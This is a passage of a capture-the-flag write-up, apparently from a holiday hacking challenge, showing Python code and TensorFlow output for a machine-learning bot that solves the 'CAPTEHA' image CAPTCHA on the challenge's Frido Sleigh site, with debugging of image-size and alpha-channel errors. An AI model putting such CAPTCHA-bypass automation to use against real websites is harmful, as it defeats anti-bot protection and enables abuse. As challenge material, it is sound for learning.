&lt;span class="go"&gt;2019-12-31 14:33:43.046835: I tensorflow/core/grappler/optimizers/meta_optimizer.cc:716] Optimization results for grappler item: graph_to_optimize&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:43.046868: I tensorflow/core/grappler/optimizers/meta_optimizer.cc:718]   constant folding: Graph size after: 790 nodes (-1042), 1855 edges (-1304), time = 156.762ms.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:43.046878: I tensorflow/core/grappler/optimizers/meta_optimizer.cc:718]   constant folding: Graph size after: 790 nodes (0), 1855 edges (0), time = 26.732ms.&lt;/span&gt;
&lt;span class="go"&gt;TFLite model exported to capteha_lite_model&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I pretty much ran the tool with default parameters, as described in the README.
I did change the &lt;code&gt;--batch_size&lt;/code&gt; argument to 16, instead of the default of
32, because the program consumed to much RAM and kept crashing. It was still
pretty close to total RAM consumption with these parameters. I left the program
running on my laptop for about 1h30, without any other programs running, and it
generated my model.&lt;/p&gt;
&lt;p&gt;Now that we have our model, we need to call it in our &lt;code&gt;capteha_api.py&lt;/code&gt;
file to categorize our different images. I took example on TensorFlow's own
&lt;a class="reference external" href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py"&gt;label_image.py&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So here's the functions I created:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;load_labels&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sd"&gt;&amp;#39;&amp;#39;&amp;#39;This functions load our different image categories (Candy Canes,&lt;/span&gt;
&lt;span class="sd"&gt;    Christmas Trees, Ornaments, Presents, Santa Hats, and  Stockings)&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;r&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;line&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;readlines&lt;/span&gt;&lt;span class="p"&gt;()]&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;image_from_b64&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sd"&gt;&amp;#39;&amp;#39;&amp;#39;This function creates and image object from the base64 value sent by&lt;/span&gt;
&lt;span class="sd"&gt;    the Frido Sleigh server&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;img_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;base64&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="n"&gt;img&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;io&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BytesIO&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;img_data&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;img&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;categorize_image&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;labels&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;img&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sd"&gt;&amp;#39;&amp;#39;&amp;#39;This function takes an image and our machine learning model, and&lt;/span&gt;
&lt;span class="sd"&gt;    returns the label that matches the image the most&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;input_details&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_input_details&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;output_details&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_output_details&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="n"&gt;input_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;expand_dims&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;img&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;axis&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;input_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;float32&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;input_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mf"&gt;127.5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mf"&gt;127.5&lt;/span&gt;

    &lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;set_tensor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;input_details&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;index&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;input_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;invoke&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="n"&gt;output_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_tensor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;output_details&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;index&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="n"&gt;results&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;squeeze&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;output_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;top_result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argsort&lt;/span&gt;&lt;span class="p"&gt;()[&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;labels&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;top_result&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;yourREALemailAddress&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;lt;you_should_put_your_real_mail@here.com&amp;gt;&amp;quot;&lt;/span&gt;

    &lt;span class="c1"&gt;# Preparing Tensorflow information. Since it takes some time to load,&lt;/span&gt;
    &lt;span class="c1"&gt;# we load it before calling the API.&lt;/span&gt;
    &lt;span class="n"&gt;labels&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;load_labels&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./capteha_labels.txt&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;interpreter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;lite&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Interpreter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;model_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./capteha_lite_model&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;allocate_tensors&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# Creating a session to handle cookies&lt;/span&gt;
    &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;https://fridosleigh.com/&amp;quot;&lt;/span&gt;

    &lt;span class="c1"&gt;# Getting information from the Frido Seligh website&lt;/span&gt;
    &lt;span class="n"&gt;json_resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;{}api/capteha/request&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;b64_images&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json_resp&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;images&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;                    &lt;span class="c1"&gt;# A list of dictionaries eaching containing the keys &amp;#39;base64&amp;#39; and &amp;#39;uuid&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;challenge_image_type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json_resp&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;select_type&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;     &lt;span class="c1"&gt;# The Image types the CAPTEHA Challenge is looking for.&lt;/span&gt;
    &lt;span class="n"&gt;challenge_image_types&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;challenge_image_type&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;challenge_image_type&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;challenge_image_type&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; and &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()]&lt;/span&gt; &lt;span class="c1"&gt;# cleaning and formatting&lt;/span&gt;

    &lt;span class="n"&gt;uuid_results&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# Categorizing images&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;b64_image&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;b64_images&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;img_category&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;categorize_image&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;interpreter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;labels&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;image_from_b64&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;img_category&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;challenge_image_types&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;uuid_results&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;uuid&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;

    &lt;span class="c1"&gt;# This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .&lt;/span&gt;
    &lt;span class="n"&gt;final_answer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;uuid_results&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# [...] the rest of the file is the same as Krampus&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we have everything we need: we load our model, get the different
images, categorize them using our model, and select only the images in
categories asked by the CAPTEHA. Let's launch our script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./capteha_api.py
&lt;span class="go"&gt;INFO: Initialized TensorFlow Lite runtime.&lt;/span&gt;
&lt;span class="go"&gt;Traceback (most recent call last):&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;./capteha_api.py&amp;quot;, line 109, in &amp;lt;module&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    main()&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;./capteha_api.py&amp;quot;, line 73, in main&lt;/span&gt;
&lt;span class="go"&gt;    img_category = categorize_image(interpreter, labels, image_from_b64(b64_image))&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;./capteha_api.py&amp;quot;, line 41, in categorize_image&lt;/span&gt;
&lt;span class="go"&gt;    interpreter.set_tensor(input_details[0][&amp;#39;index&amp;#39;], input_data)&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;/home/user/venv/tensorflow/lib/python3.6/site-packages/tensorflow_core/lite/python/interpreter.py&amp;quot;, line 346, in set_tensor&lt;/span&gt;
&lt;span class="go"&gt;    self._interpreter.SetTensor(tensor_index, value)&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;/home/user/venv/tensorflow/lib/python3.6/site-packages/tensorflow_core/lite/python/interpreter_wrapper/tensorflow_wrap_interpreter_wrapper.py&amp;quot;, line 136, in SetTensor&lt;/span&gt;
&lt;span class="go"&gt;    return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_SetTensor(self, i, value)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;ValueError: Cannot set tensor: Dimension mismatch. Got 112 but expected 224 for dimension 1 of input 175.&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get an error... The message says that there's a dimension mismatch, and that
our script expected a dimension of 224. If we take a look at Krampus' image
catalogue, we can see that every image has a size of 224 x 224 pixels. If we
give an image that does not have the same size, it can't use our model to try
and categorize it. So, let's modify our code to resize every CAPTEHA image to
be 224 x 224:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;image_from_b64&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;img_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;base64&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="n"&gt;img&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;io&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BytesIO&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;img_data&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="n"&gt;img&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;img&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;resize&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="mi"&gt;224&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;224&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;img&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, let's relaunch our script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./capteha_api.py
&lt;span class="go"&gt;INFO: Initialized TensorFlow Lite runtime.&lt;/span&gt;
&lt;span class="go"&gt;Traceback (most recent call last):&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;./capteha_api.py&amp;quot;, line 110, in &amp;lt;module&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    main()&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;./capteha_api.py&amp;quot;, line 74, in main&lt;/span&gt;
&lt;span class="go"&gt;    img_category = categorize_image(interpreter, labels, image_from_b64(b64_image))&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;./capteha_api.py&amp;quot;, line 42, in categorize_image&lt;/span&gt;
&lt;span class="go"&gt;    interpreter.set_tensor(input_details[0][&amp;#39;index&amp;#39;], input_data)&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;/home/user/venv/tensorflow/lib/python3.6/site-packages/tensorflow_core/lite/python/interpreter.py&amp;quot;, line 346, in set_tensor&lt;/span&gt;
&lt;span class="go"&gt;    self._interpreter.SetTensor(tensor_index, value)&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;/home/user/venv/tensorflow/lib/python3.6/site-packages/tensorflow_core/lite/python/interpreter_wrapper/tensorflow_wrap_interpreter_wrapper.py&amp;quot;, line 136, in SetTensor&lt;/span&gt;
&lt;span class="go"&gt;    return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_SetTensor(self, i, value)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;ValueError: Cannot set tensor: Dimension mismatch. Got 4 but expected 3 for dimension 3 of input 175.&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, still this dimension mismatch error message. However, the first one talked
about &amp;quot;dimension 1&amp;quot;. This one talks about &amp;quot;dimension 3&amp;quot;. We're talking about
images: dimension 1 must be the height, dimension 2 the witdh. What can
dimension 3 be? Since we're manipulating &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Portable_Network_Graphics"&gt;PNG images&lt;/a&gt;,
there's an &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Alpha_compositing"&gt;alpha channel&lt;/a&gt;,
used to encode the transparency of the background.&lt;/p&gt;
&lt;p&gt;I decided to remove the transparent background from the image. I used &lt;a class="reference external" href="https://stackoverflow.com/a/9459208"&gt;this
StackOverflow's answer&lt;/a&gt; to see how to
do it using &lt;a class="reference external" href="https://www.pythonware.com/products/pil/"&gt;PIL&lt;/a&gt;. Here's our new
code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;image_from_b64&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;img_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b64_image&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;base64&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="n"&gt;first_img&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;io&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BytesIO&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;img_data&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="n"&gt;img&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;RGB&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;first_img&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;255&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;255&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;255&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;    &lt;span class="n"&gt;img&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;paste&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;first_img&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;mask&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;first_img&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;()[&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/span&gt;    &lt;span class="n"&gt;img&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;img&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;resize&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="mi"&gt;224&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;224&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

